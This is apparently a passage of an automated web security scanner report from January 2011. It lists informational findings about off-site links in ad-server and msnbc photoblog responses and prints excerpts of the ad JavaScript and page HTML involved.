http://redcated/K01/iview/271569794/direct/01/2117503039?click=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/2117503039/Frame1/WorldPub/PSC_PBS_NOVA_ROS_300x100_CO/PSC_PBS_NOVA_ROS_300x100_CO.html/72634857383031466e4e454142726a6b?
http://redcated/K01/view/271569794/direct/01/2117503039

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13662
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/973660255/Bottom/WorldPub/PSC_CSX_Home_Geo_728x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?;ord=973660255?">\n');
document.write ('</SCRIPT>
...[SNIP]...
x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;ord=973660255?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;ord=973660255?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
00x250_Jan11/PSC_Digikey_BOWN_300x250.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968.4;sz=300x250;ord=1120588389?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.4;sz=300x250;ord=1120588389?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
8389/BottomRight/WorldPub/PSC_Digikey_BOWN_300x250_Jan11/PSC_Digikey_BOWN_300x250.html/72634857383031466e4e454142726a6b?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'Frame1') {
document.write ('<iframe src="http://view.atdmt.com/K01/iview/271569794/direct/01/2117503039?click=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/2117503039/Frame1/WorldPub/PSC_PBS_NOVA_ROS_300x100_CO/PSC_PBS_NOVA_ROS_300x100_CO.html/72634857383031466e4e454142726a6b?" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100">\n');
document.write ('<script language="JavaScript" type="text/javascript">
...[SNIP]...
L24/2117503039/Frame1/WorldPub/PSC_PBS_NOVA_ROS_300x100_CO/PSC_PBS_NOVA_ROS_300x100_CO.html/72634857383031466e4e454142726a6b?http://clk.redcated/K01/go/271569794/direct/01/2117503039" target="_blank"><img border="0" src="http://view.atdmt.com/K01/view/271569794/direct/01/2117503039" /></a>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1329198827/Position1/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>');
}
if (position == 'Right1') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/16016899/Right1/WorldPub/PSC_AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?;ord=16016899?">\n');
document.write ('</SCRIPT>
...[SNIP]...
AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;ord=16016899?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;ord=16016899?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
P_300x250_Jan11/PSC_Digikey_HP_300x250.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968.2;sz=300x250;ord=395977082?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.2;sz=300x250;ord=395977082?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/637465660/Right3/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
ey_HP_728x90_Jan11/PSC_Digikey_HP_728x90.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968;sz=728x90;ord=2054956119?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968;sz=728x90;ord=2054956119?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Click Here"></A>
...[SNIP]...
/oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L14/1108816809/Top1/WorldPub/PSC_HouseCirc_ROS_205x94/psc_205x90_house.gif/72634857383031466e4e454142726a6b?x" target="_blank"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/WorldPub/PSC_HouseCirc_ROS_205x94/psc_205x90_house.gif/1277498109" ALT="" BORDER="0"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/338548948/x01/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
</div>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657?">\n');
document.write ('</SCRIPT>
...[SNIP]...
AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;ord=283638657?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;ord=283638657?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
Nav_88x31_Jan11/PSC_Digikey_DrpNav_88x31.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968.8;sz=88x31;ord=905700210?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.8;sz=88x31;ord=905700210?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/74080502/x04/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
</div>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241?">\n');
document.write ('</SCRIPT>
...[SNIP]...
_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;ord=866922241?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;ord=866922241?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1774885978/x89/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1593650714/x90/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1948896634/x96/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

22.246. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.scientificamerican.com
Path:	/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60

The response contains the following links to other domains:

http://ad-apac.doubleclick.net/ad/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;ord=1016552314?
http://ad-apac.doubleclick.net/adj/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;click0=http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1016552314/Right2/sciam.com/p_2010-12_Volt_CoBrand_ros/p_2010-12_Volt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?;ord=1016552314?
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=2005419&Page=&PluID=0&Pos=6562
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=2009818&Page=&PluID=0&Pos=6562
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1242882707/Right1/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://$$&ord=1242882707
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2009818&PluID=0&w=728&h=90&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1095766167/Top/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://$$&ord=1095766167
http://imagec14.247realmedia.com/RealMedia/ads/Creatives/sciam.com/i_2010-09_Newsletters/nwsltrs_120x90.gif/1285109808
http://imagec14.247realmedia.com/RealMedia/ads/Creatives/sciam.com/s_2010-09_keep-evolving/SciAm_KeepEvolving_728x90.jpg/1285108312

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:14:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7042
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1242882707/Right1/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://$$&ord=1242882707"></script>
...[SNIP]...
g_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp?FlightID=2005419&Page=&PluID=0&Pos=6562" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=2005419&Page=&PluID=0&Pos=6562" border=0 width=300 height=250></a>
...[SNIP]...
</noscript>\n');
}
if (position == 'Right2') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-apac.doubleclick.net/adj/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;click0=http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1016552314/Right2/sciam.com/p_2010-12_Volt_CoBrand_ros/p_2010-12_Volt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?;ord=1016552314?">\n');
document.write ('</SCRIPT>
...[SNIP]...
lt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?http://ad-apac.doubleclick.net/jump/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;ord=1016552314?">\n');
document.write ('<IMG SRC="http://ad-apac.doubleclick.net/ad/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;ord=1016552314?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
</NOSCRIPT>\n');
}
if (position == 'Top') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2009818&PluID=0&w=728&h=90&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1095766167/Top/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://$$&ord=1095766167"></script>
...[SNIP]...
ng_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp?FlightID=2009818&Page=&PluID=0&Pos=6562" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=2009818&Page=&PluID=0&Pos=6562" border=0 width=728 height=90></a>
...[SNIP]...
/ads/click_lx.ads/sciam.com/observations/L9/509007020/x40/sciam.com/i_2010-09_Newsletters/i_2010-09_Newsletters_120x90.html/72634857383031466e495541436f5532" target="_blank">\n');
document.write (' <img src="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/sciam.com/i_2010-09_Newsletters/nwsltrs_120x90.gif/1285109808" style="border:0px black solid;" width="120" height="90" alt="" />\n');
document.write ('</a>
...[SNIP]...
s/click_lx.ads/sciam.com/observations/L9/1369103083/x41/sciam.com/s_2010-09_keep-evolving/s_2010-09_keep-evolving_120x90.html/72634857383031466e495541436f5532" target="_blank">\n');
document.write (' <img src="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/sciam.com/s_2010-09_keep-evolving/SciAm_KeepEvolving_728x90.jpg/1285108312" width="120" height="90" alt="" style="border:0px black solid;" />\n');
document.write (' </a>
...[SNIP]...

22.247. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001

The response contains the following links to other domains:

http://2srvhm.newsvine.com/
http://a--smith-1451820.newsvine.com/
http://aanhonestsortnhonestsort-1436725.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://attameus.newsvine.com/
http://billybill.newsvine.com/
http://brilli99.newsvine.com/
http://cabernet2go.newsvine.com/
http://catastrophe3.newsvine.com/
http://chibnikh.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://countrygirl78.newsvine.com/
http://danwill2.newsvine.com/
http://dateline.msnbc.com/
http://daughterofdaedalus.newsvine.com/
http://daveo2998087.newsvine.com/
http://davidf3.newsvine.com/
http://ds-houston.newsvine.com/
http://dumbjock.newsvine.com/
http://edwardduffy.newsvine.com/
http://elven-bookworm.newsvine.com/
http://eric2189088.newsvine.com/
http://ffeineandsugar.newsvine.com/
http://fritz2712801.newsvine.com/
http://ghost2516914.newsvine.com/
http://glenbo02.newsvine.com/
http://hal90004.newsvine.com/
http://halowain.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ilovecanoes.newsvine.com/
http://isthishumanity.newsvine.com/
http://iwonder2997692.newsvine.com/
http://jayphly1300264.newsvine.com/
http://john-roach.newsvine.com/
http://josh1791701.newsvine.com/
http://jpfs52.newsvine.com/
http://jwp6868.newsvine.com/
http://larbell.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/photoblog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=1221780086&do=msnbc.redacted&rf=http%3A%2F%2Fhp-notebook.us.redacted%2F%3Fpc%3DHPNTDF&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::
http://mar2892158.newsvine.com/
http://markscastle.newsvine.com/
http://martyofredbay.newsvine.com/
http://mc2075922.newsvine.com/
http://mdb123.newsvine.com/
http://mikeobama2313287.newsvine.com/
http://mikeymike.newsvine.com/
http://mklavano.newsvine.com/
http://mnstrm2.newsvine.com/
http://mpp2029706.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nerakluvs.newsvine.com/
http://nightly.msnbc.com/
http://oscarpwalnuts.newsvine.com/
http://pandori.newsvine.com/
http://patrick111.newsvine.com/
http://paulhardy.newsvine.com/
http://phantombeast.newsvine.com/
http://phillyc1.newsvine.com/
http://phloeman.newsvine.com/
http://phoehammer.newsvine.com/
http://platform.twitter.com/widgets.js
http://polanofp.newsvine.com/
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://raysmith.newsvine.com/
http://redtape.msnbc.com/
http://revitray.newsvine.com/
http://revlucifer.newsvine.com/
http://robw1001.newsvine.com/
http://roy-1813861.newsvine.com/
http://rwh0829.newsvine.com/
http://sbphrog.newsvine.com/
http://scott-mckinsey.newsvine.com/
http://sdo.gsfc.nasa.gov/
http://senigallia.newsvine.com/
http://snrekkcaj.newsvine.com/
http://sonflower.newsvine.com/
http://spaceweather.com/
http://spiddas.newsvine.com/
http://steveorevo.newsvine.com/
http://takestwo.newsvine.com/
http://tamuk.newsvine.com/
http://thekhankubla.newsvine.com/
http://today.msnbc.com/
http://tony2997870.newsvine.com/
http://tracer58.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/b0yle
http://twitter.com/share
http://twyla-moon.newsvine.com/
http://unregistereduser.newsvine.com/
http://uradouch.newsvine.com/
http://votelover.newsvine.com/
http://whyajones.newsvine.com/
http://wvbuild.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.byjohnroach.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/cosmiclog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://www.hotmail.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=19
Date: Sat, 29 Jan 2011 23:50:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176986

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=1221780086&do=msnbc.redacted&rf=http%3A%2F%2Fhp-notebook.us.msn.com%2F%3Fpc%3DHPNTDF&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
